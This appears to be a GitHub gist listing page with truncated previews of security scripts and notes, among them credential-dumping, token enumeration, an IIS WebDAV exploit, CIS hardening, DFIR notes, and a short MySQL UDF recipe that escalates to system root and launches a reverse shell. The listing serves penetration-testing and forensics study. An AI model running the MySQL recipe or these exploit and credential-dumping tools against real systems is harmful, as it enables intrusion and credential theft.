This gist has moved to its own repository HERE
See you there!
Rahmi YILDIZ rahmiy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # Description: Performs various techniques to dump hashes from the | |
| # remote machine without executing any agent there. | |
| # For SAM and LSA Secrets (including cached creds) | |
| # we try to read as much as we can from the registry |
todmephis
/ cis_centos7_hardening.sh
Last active
February 26, 2025 10:00
Hardening CentOS 7 CIS script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| MODPROBEFILE="/etc/modprobe.d/CIS.conf" | |
| #MODPROBEFILE="/tmp/CIS.conf" | |
| ANSWER=0 | |
| analyze_part () { | |
| if [ "$#" != "1" ]; then | |
| options="$(echo $@ | awk 'BEGIN{FS="[()]"}{print $2}')" | |
| echo "[+]$@" | |
| apply_part_rule $1 |
vector-sec
/ Get-Token.ps1
Created
August 10, 2017 17:51
PowerShell script to enumerate all Process and Thread tokens.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-Token | |
| { | |
| foreach($proc in (Get-Process)) | |
| { | |
| if($proc.Id -ne 0 -and $proc.Id -ne 4) | |
| { | |
| try | |
| { | |
| $hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| BLACK="\033[30m" | |
| RED="\033[31m" | |
| GREEN="\033[32m" | |
| YELLOW="\033[33m" | |
| BLUE="\033[34m" | |
| PINK="\033[35m" | |
| CYAN="\033[36m" | |
| WHITE="\033[37m" |
mgeeky
/ iis_webdav_upload.py
Last active
July 25, 2023 17:39
Microsoft IIS WebDAV Write Code Execution exploit (based on Metasploit HDM's <iis_webdav_upload_asp> implementation)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import requests | |
| import string | |
| import random | |
| import sys | |
| def randstring(N = 6): | |
| return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N)) |
unfo
/ how-to-oscp-final.md
Last active
September 23, 2024 17:38
graysonchao
/ DFIR.md
Last active
January 19, 2024 11:51
Digital Forensics & Incident Response Notes (cleanup in progress)
#DFIR These are my notes from BlackHat 2016 Digital Forensics & Incident Response Training
##Windows Drive Forensics NTFS: host default <---- Course focus ReFS: eventually the host default (not yet) <---- basically nothing FAT: external drives <--- a little focus ExFat: high-cap external drives <--- basically nothing
Our tools will mostly deal with NTFS and FAT.
p0c
/ mysql_root_to_system_root
Last active
August 14, 2021 23:58
#pentest #recipe: mysql root -> system root (linux)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
| # (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
| mysql> use mysql; | |
| mysql> create table test(line blob); | |
| mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
| mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
| mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
| mysql> select sys_exec('./reverse_shell &'); |